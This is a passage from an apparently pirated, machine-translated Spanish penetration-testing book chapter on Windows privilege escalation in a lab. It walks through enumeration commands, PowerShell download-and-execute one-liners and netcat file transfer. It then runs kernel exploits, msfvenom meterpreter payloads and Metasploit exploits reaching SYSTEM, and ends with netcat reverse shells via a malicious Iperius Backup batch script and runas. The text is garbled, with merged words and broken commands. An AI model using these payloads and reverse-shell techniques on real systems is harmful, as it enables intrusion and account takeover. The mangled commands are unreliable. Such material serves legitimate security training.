enumerar todas las unidades en el sistema operativo Windows, usemos la utilidad wmic una vez más: C:\Users\Gus>wmic logicaldiskgetcaption||fsutilfsinfodrives Subtítulo C: D: Parches instalados Para enumerar los parches del sistema instalados en el sistema operativo Windows, puede usar la información del sistema Canal de Telegram : @IRFaraExam Machine Translated by Google comando que usamos anteriormente. Este trabajo también se puede realizar usando el utilidad wmic : C:\Usuarios\Gus>wmic qfegetCaption, Descripción, HotFixID, InstalledOn TítuloDescripciónInstalado en HotFixID http://support.microsoft.com/?kbid=4570720UpdateKB45707209/8/2020 http://support.microsoft.com/?kbid=4465065ActualizaciónKB44650656/1/2020 http://support.microsoft.com/?kbid=4470788Actualización de seguridadKB44707883/6/2019 http://support.microsoft.com/?kbid=4487038Actualización de seguridadKB44870383/6/2019 http://support.microsoft.com/?kbid=4549947Actualización de seguridadKB45499476/1/2020 http://support.microsoft.com/?kbid=4561600Actualización de seguridadKB45616006/15/2020 http://support.microsoft.com/?kbid=4562562Actualización de seguridadKB45625626/15/2020 http://support.microsoft.com/?kbid=4566424Actualización de seguridadKB45664248/25/2020 http://support.microsoft.com/?kbid=4570332Actualización de seguridadKB45703329/8/2020 https://support.microsoft.com/help/4570333SecurityUpdateKB45703339/8/2020 ¿Quién soy? Cuando haya conectado un shell a un sistema operativo Windows, una pieza de información importante que desea saber es qué privilegios tiene. quien mi comando le dará esta información: C:\Usuarios\Gus>whoami windows10lab\gus C:\Usuarios\Gus>whoami /priv PRIVILEGIOSINFORMACIÓN ---------------------PrivilegeName Descripción Estado ================================================== =============== ======== SeShutdownPrivilege Apagarelsistema Canal de Telegram : @IRFaraExam Machine Translated by Google Discapacitado SeChangeNotifyPrivilegio Activado Comprobación de derivación transversal SeUndockPrivilege Discapacitado Quitar la computadora de la estación de acoplamiento SeIncreaseWorkingSetPrivilegeIncreaseaprocessworkingset Discapacitado SeTimeZonePrivilege Discapacitado cambiarlazonahoraria ListarUsuariosyGrupos Tiene muchas opciones para incluir a los usuarios locales en el sistema operativo Windows. ¿Por qué es importante para la escalada de privilegios? los usuarios y grupos proporcionarán una gran visión acerca de cómo cambiar de un usuario limitado a otro usuario con privilegios de administrador. este es usuario de red : C:\Users\Gus>netuser Cuentas de usuario para\\WINDOWS10LAB -------------------------------------------------- ----------------- ----Administrador adminDefaultAccount gus InvitadoWDAGCuenta de utilidad El comando se completó con éxito. A continuación, puede elegir el usuario al que desea apuntar y obtener su información: C:\Usuarios\Gus>net useradmin Nombre de usuario administración Nombre completo administración Comentario comentario del usuario administración Código de país/región Contable 000 (predeterminado del sistema) sí La cuenta caduca Nunca última contraseña 15/6/202012:47:47 p. m. La contraseña caduca Nunca Contraseña cambiable 16/6/202012:47:47 p. m. Se requiere contraseña El usuario puede cambiar la contraseña sí sí Canal de Telegram : @IRFaraExam Machine Translated by Google Estaciones de trabajo permitidas Todos Guión de inicio de sesión Perfil del usuario directorio de inicio Último inicio de sesión9/4/2020 5:01:21 p. m. Horas de inicio de sesión permitidas Todos Membresías de grupos locales *Administradores *Remoto Usuarios de escritorio *Membresías del grupo global de usuarios*Ninguno El comando completó se correctamente. Para enumerar los grupos locales en el host de Windows, use el comando netlocalgroup : C:\Usuarios\Gus> net localgroup Alias para\\WINDOWS10LAB -------------------------------------------------- ----------------- ----* AccessControlAssistanceOperadores * Administradores * Backupoperadores * Criptografos operadores * Distribuidores * Distribuidores * EventLograds * Huésped * HyperVadministrators * Iis_Irs * NetworkConfigurationoperators * PerformanceLogusers * PerformanceMonitoryers Para obtener información detallada sobre un determinado grupo, use esto: Canal de Telegram : @IRFaraExam Machine Translated by Google C:\Usuarios\Gus> net localgroupIIS_IUSRS AliasnameIIS_IUSRS Grupo integrado utilizado por Internet Information Comment Services. Miembros -------------------------------------------------- ----------------- ----NTAUTHORITY\IUSR El comando se completó correctamente. Si el host está conectado al controlador de dominio, entonces puede enumerar los grupos de dominio, como se muestra aquí: C:\Users\Gus>net group/domain La solicitud se procesará en un controlador principal para el dominio KCorp.local. Cuentas de grupo para\\AD-Server.KCorp.local -------------------------------------------------- ----------------- ----*Controladores de dominio clonables *DnsUpdateProxy *Administradores de dominio *Equipos de dominio *Controladores de dominio *Invitados de dominio *Usuarios de dominio *Administradores de empresa *Administradores de clave de empresa *Controladores de dominio de solo lectura de empresa *Propietarios del creador de directivas de grupo *Administradores clave *Usuarios protegidos *Controladores de dominio de solo lectura *Administradores de esquema completo El comando se completó con éxito. Para ver los detalles sobre un determinado grupo de dominio, utilice: C:\Usuarios\Gus> grupo/dominio de red"DomainAdmins" La solicitud se procesará en un controlador principal para el dominio KCorp.local. Nombre del grupo Administradores de dominio Comentario Administradores Designados Del Dominio Canal de Telegram : @IRFaraExam Machine Translated by Google Miembros -------------------------------------------------- ----------------- ----- Administrador El comando se completó con éxito. RedesInformación Para obtener una lista de todas las interfaces de red y sus direcciones IP asociadas, puede utilizar el comando ipconfig : C:\Usuarios\Gus>ipconfig /todos Configuración IP de Windows . . . . . Sufijo Dns primario. Tipo de nodo. . . . . . Enrutamiento IP Habilitado.. WINSProxy Habilitado.. DNSSuffixSearchList.. Nombre de host. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . : : : : : : Windows10Lab KCorp.local Híbrido No No KCorp.local Adaptador EthernetEthernet0: Sufijo DNS específico de la conexión. . . . . . . . . . Descripción. Conexión de red . . . . . . Dirección física.. . . . . . . . . DHCP habilitado.. Configuración automática habilitada. . . . . . Enlace-direcciónIPv6local. fe80::8920:1b10:a0d5:635b%4(Preferido) . . . . . . . . Dirección IPv4.. Máscara de subred. . . . . . . . . . . . . . . . . Contrato obtenido.. 17:30:43 El arrendamiento caduca. . . . . . . . . 8:58:33 a. m. Puerta de enlace predeterminada. . . . . . . . . . . . . . . . . Servidor DHCP. . . . . . . . . . DHCPv6IAID. . . . . . DHCPv6ClientDUID.. 29-1B-72-43 Servidores DNS.172.16.0.1 :KCorp.local . :Intel(R)82574LGigabit . . . . :00-0C-29-1B-72-43 :Sí :Sí : . :172.16.0.104(Preferido) . :255.255.255.0 . :martes,8 de septiembre de 2020 . :jueves,17 de septiembre de 2020 . . . . :172.16.0.1 :172.16.0.2 :67111977 : 00-01-00-01-26-66-BD-99-00-0C . . . . . . . . . . :172.16.0.2 NetBIOS sobre Tcpip.. . . . . . . :Activado Canal de Telegram : @IRFaraExam Machine Translated by Google […] Para enumerar la tabla de enrutamiento del host local , puede usar el comando de impresión de ruta. la tabla de enrutamiento de host le mostrará todas las conexiones de ruta de red a otros hosts en la misma red: C:\Usuarios\Gus> imprimir ruta ================================================== ====== Lista de interfaz 4…000c291b7243……Intel(R)82574LGigabitNetworkConnection 6…9cb6d0fd7b1a…….Dispositivo Bluetooth (Red de área personal) 1………………………………Interfaz de bucle invertido de software1 ================================================== ====== Tabla de rutas IPv4 ================================================== ====== rutas activas: Interfaz Métrica NetworkDestinationNetmaskGateway0.0.0.00.0.0.0172.16.0.1172.16.0.104255.0.0.0Onlink127.0.0.0127.0.0.1127.0.0.1255.255.255.255Onlink127.0.0.1127.255.255.255255.255.255.255Onenlace172.16.0.104 link127.0.0.1172.16 .0.0255.255.255.0En 25 331 331 331 281 […] Para enumerar todas las conexiones actuales establecidas desde el host de Windows (por ejemplo, web servidor, SMB, RDP, etc.), establezca: C:\Usuarios\Gus>netstat ÿano Conexiones activas PID LocalAddressForeignAddressState0.0.0.0: 1350.0.0.0: 00.0.0.0: 4450.0.0.0: 00.0.0.0: 33890.0.0.0: 00.0.0.0: 00.0.0.0: 76800.0.0.0: 50400.0.0.0: 00:00:04:00:04 ESCUCHANDO940 ESCUCHANDO4 00.0.0.0:496650.0.0.0:0 ESCUCHANDO736 ESCUCHANDO5608 ESCUCHANDO2056 ESCUCHAR508 ESCUCHANDO1528 ProtoTCPTCPTCPTCPTCPTCPTCPTCP[…] Para enumerar la configuración y el estado del firewall, debe usar el comando netsh : C:\Usuarios\Gus> estado de demostración del cortafuegos netsh Canal de Telegram : @IRFaraExam Machine Translated by Google Estado del cortafuegos: -------------------------------------------------- ----------------- Perfil=Dominio Modo operativo = Deshabilitar Modo de excepción=Habilitar Multidifusión/broadcastresponsemode=Habilitar Modo de notificación=Habilitar Grouppolicyversion=WindowsDefenderFirewall Remoteadminmode=Deshabilitar […] C:\Usuarios\Gus>netsh firewallshowconfig Configuración del perfil de dominio (actual): -------------------------------------------------- ----------------- Modo operativo = Deshabilitar Modo de excepción=Habilitar Multidifusión/broadcastresponsemode=Habilitar Modo de notificación=Habilitar […] Para enumerar los recursos compartidos de red en el host de Windows, deberá usar la red compartir comando. Acceder a una carpeta compartida a veces revelará secretosenelhostobjetivo: C:\Usuarios\Gus> reparto neto Nombre compartidoRecursoObservación -------------------------------------------------- ----------------- ----RemoteIPC IPC$C$C:\ADMIN$C: Compartir por defecto \WindowsCC:\ Administrador remoto SharedC:\Usuarios\admin\Documentos\Sha... Shared_GusC:\Usuarios\Gus\Documentos\Compartido UsuariosC:\Usuarios El comando se completó con éxito. Mostrar permisos débiles Para comprobar los permisos de una carpeta/archivo, puede utilizar el comando icacls. Nota que si está utilizando un antiguo sistema Windows heredado (anterior a Windows Vista), entonces tiene que usar el comando cacls : Canal de Telegram : @IRFaraExam Machine Translated by Google C:\Usuarios\Gus\Documentos>icacls Shared CompartidoWINDOWS10LAB\admin: (OI) (IC) (F) (I) (OI) (CI) (F) (I) (OI) (CI) (F) (I) (OI) (CI) (F) AUTORIDAD\SISTEMA: BUILTIN\Administradores: WINDOWS10LAB\Gus: Archivos 1 procesados correctamente; archivos 0 procesados fallidos Lo que está buscando en la salida es lo siguiente: (F) :Acceso total (M) :Modificaracceso (W) :acceso de solo escritura Para encontrar todos los permisos débiles en una unidad de disco específica, puede usar el Utilidad Sysinternals Accesschk.exe . Para obtener una copia del archivo, puede descargar del sitio oficial de Microsoft en docs.microsoft.com/en us/sysinternals/ downloads/accesschk: C:\Usuarios\Gus\Documentos\AccessChk>accesschk.exe /accepteula ÿuwqsUsersc:\*.* Accesschkv6.12-Informa permisos efectivos para objetos asegurables Copyright(C)2006-2017MarkRussinovich Sysinternals-www.sysinternals.com RWc:\$Papelera.de.reciclaje RWc:\ProgramData RWc:\ProgramData\IperiusBackup RWc:\ProgramData\USOShared RWc:\ProgramData\VMware RWc:\ProgramData\IperiusBackup\IperiusAccounts.ini RWc:\ProgramData\IperiusBackup\IperiusConfig.ini RWc:\ProgramData\IperiusBackup\Jobs RWc:\ProgramData\IperiusBackup\Logs Listado de programas instalados Para enumerar todos los programas instalados, puede usar un comando de PowerShell para mostrar el contenido de las carpetas Archivos de programa y Archivos de programa (x86). aplicaciones nos permitirán instalar cualquier software antiguo que podamos explotar). PSC:\Users\Gus> GetÿChildItem'C:\ProgramFiles','C:\Program Canal de Telegram : @IRFaraExam Machine Translated by Google Archivos(x86)'|ftParent,Nombre,LastWriteTime Padre ------ Nombre ---- LastWriteTime ------------- Archivos de programa Archivos comunes 6/1/20209:40:37 Archivos de programa PM explorador de Internet 9/8/20205:30:11 Archivos de programa 12:48:47 UNP 15/06/2020 Archivos de programa vmware 6/1/20209:40:40 Defensor de Windows 3/6/202010:13:43 Defensor de Windows Protección contra amenazas avanzada 9/8/20205:30:11 Correo de Windows 15/9/20183:33:53 Archivos de programa PM Reproductor de medios de Windows 15/6/20205:41:10 Archivos de programa WindowsMultimedia Platform 9/15/20185:10:10 ventanas 15/9/20183:42:33 Archivos de programa PM Visor de fotos de Windows 15/6/20205:41:10 ProgramaArchivosAM WindowsPortátilDispositivos 9/15/20185:10:10 SOY SOY Archivos de programa SOY Archivos de programa PM Archivos de programa SOY SOY Archivos de programa SOY […] Listado de tareas y procesos Para obtener una lista de todas las tareas y procesos en el sistema operativo Windows, deberá usar el comando tasklist/v . La salida de este comando es grande y engorrosa. Puede filtrar los resultados para mostrar solo los procesos del sistema: C:\>lista de tareas/v/fi"nombredeusuarioeqsystem" ImageName EstadoUsuarioNombre ========== ======= PIDSesionName CPUTime =============== Sesión# Título de la ventana ======== Sistema inactivo08 Proceso 0 Servicios AUTORIDAD\SISTEMA desconocido PARA Canal de Telegram : @IRFaraExam Uso de memoria ========= Machine Translated by Google 67:36:31N/A Para enumerar las tareas programadas en el host, puede usar el comando PowerShell para obtener los resultados. En el siguiente comando, estamos usando un filtro para excluir las tareas relacionadas con Microsoft, ya que estamos interesados en las tareas programadas personalizadas: PSC:\Users\Gus> GetÿScheduledTask|where{$_.TaskPathÿnotlike"\Microsoft*"}| ftTaskName,TaskPath,State Nombre de la tarea TaskPathState ------------------ -- User_Feed_Synchronization-{39054AFF-4CE0-4A65-B33D-5F0D58A8935F}\ Listo Transferencias de archivos Para los sistemas operativos Linux o Windows, necesitaremos transferir archivos al host de destino, especialmente cuando tengamos que lidiar con un exploit de kernel. En capítulos anteriores, vio los conceptos básicos de cómo transferir archivos a un host de Linux. WindowsHostDestino Si el host de destino es un sistema operativo Windows, puede usar las siguientes opciones para transferir archivos: Utilice una unidad compartida Samba e intente acceder a ella desde el shell del símbolo del sistema limitado de Windows: >copiar\\[SMBIPAddress]\[SMBFolderName]\[FileToTransfer] Utilice un cliente FTP para descargar los archivos en el host de Windows utilizando el símbolo del sistema: >ftpopen[Dirección IP del servidor FTP] Luego, ingrese las credenciales. >ftp>binario >ftp>get[nombre de archivo] Canal de Telegram : @IRFaraExam Machine Translated by Google Mi opción favorita es descargar y ejecutar el archivo usando PowerShell. Para realizar el trabajo, deberá alojar el exploit en un servidor web y, a continuación, ejecutar el siguiente comando en el símbolo del sistema: >powershell"IEX(NewObjectNet.WebClient).downloadString('http://[IPAddress]/[filename]')" El segundo método de transferir archivos usando PowerShell para crear el script en el host de Windows y luego ejecutarlo. Para crear el archivo de script, debe usar los siguientes comandos en el símbolo del sistema: >echo$storageDir=$pwd>wget.ps1 >echo$webclient=New-ObjectSystem.Net.WebClient>>wget.ps1 >echo$url="http://[IP]/ [filename]">>wget. ps1 >echo$file="[nombre de archivo]">>wget.ps1 >echo$webclient.DownloadFile($url,$file)>>wget.ps1 Recuerde que necesita reemplazar la dirección IP y el nombre del archivo de explotación con su información. Ahora, para ejecutar el archivo wget.ps1 , use PowerShell nuevamente para hacer el trabajo: >powershell.exe-ExecutionPolicyBypass-NoLogo-NonInteractive-NoProfile-Filewget.ps1 LinuxHostDestino Analicemos algunas formas de transferir archivos a un sistema operativo Linux mediante la ventana de terminal: Descarguelosarchivosdesdeunservidorwebremotomedianteunodelossiguientescomandos: $wgethttp://[IP]/[nombre de archivo] $curlo[nombre de archivo]http://[IP]/[nombre de archivo] En FreeBSD, usaría $fetch-o[nombre de archivo] http://[IP]/[nombre de archivo] . Si el servidor remoto ejecuta un servicio SSH, entonces podemos descargar el archivo de explotación utilizando una copia segura (SCP): $scpuser@IP:RemotePathLocalPath Por ejemplo, para copiar exploit.bin de un servidor SSH remoto Canal de Telegram : @IRFaraExam Machine Translated by Google (IP: 172.16.0.33) al directorio tmp local, use esto: $scpjohn@172.16.0.33:/exploit.bin/tmp/ Si el host de la víctima tiene netcat instalado , también puede usarlo para transferir archivos . OnKali: root@kali:~#nc-lvp1111<test.txt escuchando[cualquiera]1111… En Ubuntu: gus@ubuntu:~$ nc172.16.0.1021111>test.txt ^C gus@ubuntu:~$ ls DesktopDescargasVideos DocumentosmailcowdockerizedPicturestemptest.txt Música PublicTemplates WindowsSistemaExplotación El objetivo principal de este capítulo es obtener un shell de administrador. En Windows, puede ir más allá de una cuenta de administrador y obtener una cuenta SYSTEM en su lugar. Si ese es el caso, entonces tendrá acceso total al host de Windows de destino. Las cuentas de usuario se utilizan en el sistema operativo Windows para permitir que los humanos inicien sesión en el host (por ejemplo, la cuenta de usuario administrador). Las cuentas de servicio son utilizadas por los servicios del sistema operativo y generalmente tienen un permiso de alto privilegio (por ejemplo, la cuenta SYSTEM). Los grupos se utilizan para agrupar cuentas de usuario. Un buen ejemplo es el grupo Administradores, que contiene todas las cuentas de usuario con privilegios de administrador. Es más fácil administrar un grupo de usuarios en lugar de manejar cada uno (esto es útil en organizaciones grandes donde tienen miles de empleados para administrar). Los recursos son los elementos físicos a los que cada grupo o usuario necesita acceder, Canal de Telegram : @IRFaraExam Machine Translated by Google como lo siguiente: archivos carpetas Servicios Los permisos o listas de control de acceso (ACL) son las reglas que definen quién tiene acceso a qué. Una ACL típica se parece a la Figura 11.1 en el sistema operativo Windows. Figura 11.1 Permisos de Windows WindowsKernelExploits Como aprendió en el capítulo anterior, el kernel es el núcleo del sistema operativo. Una vez que explota el kernel, tiene la propiedad total del sistema (ya sea Windows o Linux). Para hacer el trabajo, podemos usar la misma metodología que usamos para el sistema operativo Linux: 1. Obtenga la versión del sistema operativo. 2.Encontrarexplotación coincidente. 3. Transfiera el exploit a un directorio donde tenga permisos de escritura (usted Canal de Telegram : @IRFaraExam Machine Translated by Google puede necesitar compilarlo antes de transferirlo). 4. Ejecute y disfrute del shell raíz. Obtención de la versión del sistema operativo En esta etapa, estamos conectados de forma remota a un host de Windows 7 usando un número limitado shell. A continuación, ejecute el comando system info para ver los detalles sobre el funcionamiento sistema: C:\Usuarios\Gus\Documentos> info del sistema |findstrOS información del sistema|findstrOS Nombre del SO: Versión del MicrosoftWindows7Professional 6.1.7601ServicePack1Build7601 SO: [[] FindaMatchingExploit El desafío en este paso es encontrar la explotación correcta. resultado, puede usar una herramienta llamada wesng (Windows Exploit Suggester) en su KalihostparavisualizarcandidatosparaestetipodeSO.Puedeobtenerwes.py _ fromtheGitHubrepoat github.com/bitsadmin/wesng/blob/master/wes.py. Primero, ejecute el comando de información del sistema sin filtrar primero. Luego , copie la salida a un archivo sysinfo.txt en Kali . Finalmente, use la herramienta wes.py para verificar paracualquierexplotación: root@kali:~# pythonwes.pyÿ actualizar root@kali:~# pythonwes.pysysinfo.txtÿi'ElevationofPrivilege'ÿÿexploitsÿonly WindowsExploitSuggester0.98(https://github.com/ bitsadmin/wesng/) [+]Salida de información del sistema de análisis [+]Sistema Operativo -Nombre: Basado en Windows7forx64 Sistemas Paquete de servicio17 -Generacion: -Construir: -Versión: -Arquitectura: -Revisiones instaladas(3): KB976902 [+]Cargando definiciones -Fechadecreacióndedefiniciones: 7601 Ninguna basado en x64 KB2534111, KB2999226, 20200902 Canal de Telegram : @IRFaraExam Machine Translated by Google [+]Determinación de parches faltantes [+]Aplicación de filtros de visualización [+]Vulnerabilidades encontradas Fecha: CVE: KB: Título: Núcleo de Windows 20161108 CVE-2016-7216 KB3197867 Actualización de seguridad para Basado en Windows7forx64 Producto afectado: Sistemas Service Pack 1 Componente afectado: Gravedad: Impacto: Exploit: db.com/exploits/40766/ Importante ElevationofPrivilege https://www.explotar […] Los resultados de salida son abrumadores, y tratando de entender el PoCon exploitÿdb es complicado. La forma más fácil de usar uno de los siguientes PoC repositorios en GitHub: github.com/SecWiki/windows-kernel-exploits Uno de los elementos, “CVEÿ2018ÿ8120”, está en la lista de GitHub, por lo que lo usaremos en los siguientes pasos. Ejecutar la carga útil y obtener un RootShell Todo lo que tiene que hacer es descargar x64.exe desde GitHu y transferirlo al host de Windows usando su caparazón limitado. Utilicé Chromium para descargar el archivo en Kali, solo usemos netcat (que ya transfirí al host de Windows) para spawnanewrootshell. Primero, desde Kali, escuche las conexiones entrantes en el puerto 3333: raíz@kali:~# ncÿnlvp3333 escuchando[cualquiera]3333… En el shell limitado de Windows, conéctese al puerto de escucha usando el privilegio archivo de escalación ( x64.exe ) que descargó de GitHub: C:\Usuarios\Gus\Documentos>x64.exe "nc.exeÿnv172.16.0.1023333ÿecmd.exe" x64.exe "nc.exe-nv172.16.0.1023333-ecmd.exe" CVE-2018-8120exploitby@unamer(https://github.com/unamer) Canal de Telegram : @IRFaraExam Machine Translated by Google [+]Getmanageratfffff900c0884c90,workeratfffff900c29ba3d0 [+]Activando vulnerabilidad… [+]Sobrescribiendo…fffff80002c58c68 Cuando regrese a la ventana de Kaliterminal, debe tener un shell raíz: root@kali:~#nc-nlvp3333 escuchando en[cualquier]3333… conectarse a[172.16.0.102]desde(DESCONOCIDO)[172.16.0.101]49219 MicrosoftWindows[Versión 6.1.7601] Copyright(c)2009MicrosoftCorporation.Todoslosderechosreservados. C:\Usuarios\Gus\Documentos>whoami whoami ntauthority\system TheMetasploitPrivEscMagic Metasploit es una funcionalidad con privilegios elevados que le permite hacer el trabajo fácilmente. Esto sonará como una herramienta de script para niños, pero es efectiva y personalmente la uso con frecuencia para encontrar exploits de kernel. Estos son los pasos necesarios para que esto funcione: 1.GetaMeterpretershellprimero. 2. Intente ejecutar el comando getsystem (esto es aplicable a los sistemas operativos Windows heredados x86). 3. A continuación, ejecute el módulo “local exploitsuggester”, que mostrará una lista de los posibles candidatos. 4. Pruebe con cada uno y observe qué candidato pasará con éxito. Comencemos. El primer paso es generar un pretershell de medidor usando MSFvenomontheKalihost: root@kali:~# msfvenomÿpwindows/x64/ meterpreter_reverse_tcpLHOST=172.16.0.102LPORT=3333ÿfexe>m_shell.exe [-]Noseseleccionóningunaplataforma,eligiendoMsf::Module::Platform::Windowsfromthepayload [-]Noarchselected,selectingarch:x64fromthepayload Noencoderspecified , emitiendo carga útil sin procesar Tamaño de carga útil: 201283 bytes Tamaño final del archivo exe: 207872 bytes A continuación, comience a escuchar en Kaliusando el módulo controlador en Metasploit: Canal de Telegram : @IRFaraExam Machine Translated by Google msf5> useexploit/multi/handler [*]Uso de la carga útil configuradagenérico/shell_reverse_tcp msf5exploit(multi/controlador)> setPAYLOADwindows/ x64/meterpreter_reverse_tcp PAYLOAD=>windows/meterpreter/reverse_tcp msf5exploit (multi / controlador)> setLHOST172.16.0.102 LHOST=>172.16.0.102 msf5exploit(multi/controlador)> setLPORT3333 LPORT => 3333 msf5exploit(multi/controlador)> setExitOnSessionfalse ExitOnSession=>falso msf5exploit(multi/handler)> exploitÿjÿz [*]Exploitejecutándose como trabajo en segundo plano0. [*]Exploitcompletó, pero no se creó ninguna sesión. msf5exploit(multi/handler)>[*]StartedreverseTCPhandleron172.16.0.102:3333 En esta etapa, transfiera el archivo m_shell.exe al host de Windows y ejecútelo use un usuario limitado. Volviendo al oyente, debería ver que tiene un conexión exitosa: msf5exploit(multi/controlador) > exploit-jz [*]Exploitejecutándose como trabajo en segundo plano0. [*]Exploitcompletó, pero no se creó ninguna sesión. [*] IniciadoreverseTCPhandleron172.16.0.102: 3333msf5exploit (multi / handler)> [*] Meterpretersession1abierto (172.16.0.102:3333-> 172.16.0.104:50536) en2020-09-0413: 09: 14-0400 [*]Meterpretersession2 abrió (172.16.0.102:3333->172.16.0.101:49159) a las 2020-09-0413:10:28-0400 msf5exploit(multi/handler)>sesiones Sesiones activas =============== Identificación -- Nombre ---- Escribe ---- Información ----------- 1 Conexión ---------- meterpreterx86/windowsWINDOWS10LAB\Gus@WINDOWS10LAB 172.16.0.102:3333->172.16.0.104:50536(172.16.0.104) 2 meterpreterx64/windowsWin7Lab\Gus@WIN7LAB172.16.0.102:3333ÿ >172.16.0.101:49159(172.16.0.101) Canal de Telegram : @IRFaraExam Machine Translated by Google msf5exploit(multi/manejador)> ¡Impresionante! Para este ejercicio, nos interesa la segunda sesión en el host de Windows 7. A continuación, inicie la sesión previa del medidor interactivo e intente obtener también la versión del sistema operativo: msf5exploit(multi/handler)> sesionesÿi2 [*]Iniciando interacción con 2… meterpreter> sysinfo Computadora: WIN7LAB: Windows7 (6.1Build7601, ServicePack1). Arquitectura sistema operativo:x64 Idioma del sistema:en_US Dominio :GRUPO DE TRABAJO Usuarios registrados: 1: x64/ windows Medidorpretermetropreter> Tenga en cuenta que el preter del medidor x64 se ejecuta en una versión de Windows x64. Siempre es una buena práctica generar una carga útil del preter del medidor con la misma arquitectura que el host de destino. A continuación, ejecute el método getsystem : meterpreter> getsystem [-]priv_elevate_getsystem:Error en la operación:El entorno es incorrecto.Se intentó lo siguiente: [-]Suplantación de tubería con nombre (en memoria/administrador) [-]Suplantación de identidad de canalización con nombre (cuentagotas/administrador) [-]TokenDuplication(InMemory/Admin) Es normal que la operación haya fallado porque el método getsystem funciona en el sistema operativo Windows x86 heredado (por ejemplo, Windows 2003/XP). meterpreter> background [*]Backgroundingsession2… msf5exploit(multi/ handler)> usepost/multi/recon/ local_exploit_suggester msf5post(multi/recon/ local_exploit_suggester)> setsession2 session=>2 msf5post(multi/recon/local_exploit_suggester)> ejecutar [*]172.16.0.101-Recopilación de exploits locales para x64/windows… [*]172.16.0.101-17exploitschecksareintesting… Canal de Telegram : @IRFaraExam Machine Translated by Google [+]172.16.0.101-exploit/windows/local/bypassuac_dotnet_profiler:Elobjetivopareceservulnerable. [+]172.16.0.101-exploit/windows/local/bypassuac_sdclt:Elobjetivopareceservulnerable. Las versiones nil se desaconsejan y quedarán en desuso en Rubygems4 [+]172.16.0.101-exploit/windows/local/ms10_092_schelevator:Elobjetivopareceservulnerable. [+]172.16.0.101ÿexploit/windows/local/ms16_014_wmi_recv_notif:Elobjetivopareceservulnerable. [*]Ejecución del módulo posteriorcompletada msf5post(multi/recon/local_exploit_sugester)> Mirando la última piedra en la lista, parece que es la más reciente, así que Úselo para esta demostración. (Probé los otros, y todos fallaron). msf5post(multi/recon/local_exploit_sugester)>usar exploit/windows/local/ ms16_014_wmi_recv_notif [*]Sin carga útil configurada, por defecto en windows/x64/ meterpreter/reverse_tcp msf5exploit(windows/local/ms16_014_wmi_recv_notif)> setpayloadwindows/x64/ meterpreter_reverse_tcp [-] El valor especificado para la carga útil no es válido. msf5exploit(windows/local/ms16_014_wmi_recv_notif)> setsession2 sesión=>2 msf5exploit (ventanas/local/ms16_014_wmi_recv_notif)> setLHOST172.16.0.102 LHOST=>172.16.0.102 msf5exploit(windows/local/ms16_014_wmi_recv_notif)> setLPORT4444 LPORT => 4444 msf5exploit(windows/local/ms16_014_wmi_recv_notif)> ejecutar [*]Se inició el controlador TCP inverso en 172.16.0.102:4444[*]Iniciando el bloc de notas para alojar el exploit... [+]Lanzamiento del Proceso 2604. [*]Inyectando reflexivamente el archivo DLL de explotación en 2604... [*]Inyectandoexplotaciónen2604… [*]Exploitinjected.Injectingpayloadinto2604… [*]Carga útil inyectada. Ejecutando explotación... [+] Explotación finalizada, espere a que se complete la ejecución de la carga útil (con suerte con privilegios). [*] Etapa de envío (201283 bytes) a 172.16.0.101 [*]Meterpretersession3abierto(172.16.0.102:4444>172.16.0.101:49160)en2020-09-0413:25:03-0400 metropreter>presenciado Nombre de usuario del servidor: NTAUTHORITY\SYSTEM Canal de Telegram : @IRFaraExam Machine Translated by Google metro preter> Tenemos una cuenta del sistema. ¡Eso es siete mejor que una cuenta de administrador! Explotación de aplicaciones de Windows Las aplicaciones pueden instalarse en los sistemas operativos Windows y luego ejecutarse con privilegios de administrador/sistema. Cada aplicación se explotará de manera diferente, pero el objetivo es el mismo (obtener una cuenta de administrador local). 1.IdentifiquelasaplicacionesyainstaladasenelsistemaWindowslocal. 2. Comparta y descubra si hay algún exploit en Internet. 3. Aplique las instrucciones que se enumeran en la PoC de explotación. La forma más fácil de enumerar las aplicaciones instaladas en el sistema operativo Windows es navegar por el directorio Archivos de programa y buscar una aplicación que suene una campana. Ya estoy conectado a un host a través de una sesión RDP con el usuario limitado gus. La inspección de la carpeta Archivos de programa (x86) muestra que una aplicación personalizada llamada Iperius Backup ya está instalada en el sistema local (consulte la Figura 11.2). Figura 11.2 Copia de seguridad de Iperius Mi siguiente desafío es determinar la versión de este software. Al abrir la aplicación y acceder a la pestaña Acerca de, se muestra que la versión instalada es 6.1.0, como se muestra en la Figura 11.3. (Recuerde que nos estamos conectando a través de RDP, por lo que tenemos acceso a la GUI). Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 11.3 Ficha Acerca de Iperius Buscando en el sitio web de exploitÿdb , encontré un buen candidato. Consulte la figura 11.4. Figura 11.4 ExploitÿDB–IperiusExploitation Siguiendo las instrucciones de la PoC, siga estos pasos (consulte la Figura 11.5): 1. Cree un trabajo de respaldo. 2. Establezca el directorio de origen en la pestaña Elementos. 3.EstablezcaeldirectorioDestinos. 4. En la ficha Otro proceso, cree un script llamado evil.bat para ejecutar netcat El script netcat contiene el siguiente código : @echooff C: \Usuarios\Gus\Documentos\Compartido\nc.exe172.16.0.1022222-ecmd.exe Es hora de obtener el shell del administrador. En nuestro host Kali, ejecutaremos netcat en modo de escucha en el puerto 2222. Una vez que el puerto de escucha se esté ejecutando, cambie al host de Windows, guarde el trabajo de copia de seguridad y ejecute la unidad. Cuando regresemos al host Kali, deberíamos tener un nuevo shell de administrador remoto: Canal de Telegram : @IRFaraExam . Machine Translated by Google Figura 11.5 Iperius– Evil.batConfig root@kali:~# ncÿnlvp2222 escuchando[cualquiera] 2222… conectarse a[172.16.0.102]desde(DESCONOCIDO)[172.16.0.104]50451 MicrosoftWindows[Versión10.0.17763.1397] (c)2018MicrosoftCorporation.Todoslosderechosreservados. C:\Usuarios\Gus\Documentos\Compartido>whoami whoami windows10lab\admin CorriendoAsinWindows Si está ejecutando un usuario con privilegios bajos y tiene credenciales de administrador (el nombre de usuario y la contraseña), entonces puede usar esas credenciales para aumentar su privilegio. La forma más práctica es copiar un shell inverso primero (por ejemplo, netcat o uno generado usando MSFvenom) . En este ejemplo, primero iniciamos una escucha de netcat en Kalius usando el número de puerto Canal de Telegram : @IRFaraExam Machine Translated by Google 6666. A continuación, utilizando nuestro shell limitado, se conectará a este escuchando las credenciales de administrador: C:\Usuarios\Gus>C:\Windows\System32\runas.exe/env/noprofile/ user:admin"C:\Usuarios\Gus\Documentos\nc.exe172.16.0.1026666ÿeC: \Windows\System32\ cmd.exe" Ingrese la contraseña para admin: Intentando iniciar C:\Users\Gus\Documents\nc.exe172.16.0.1026666-eC: \Windows\System32\cmd.exe como usuario 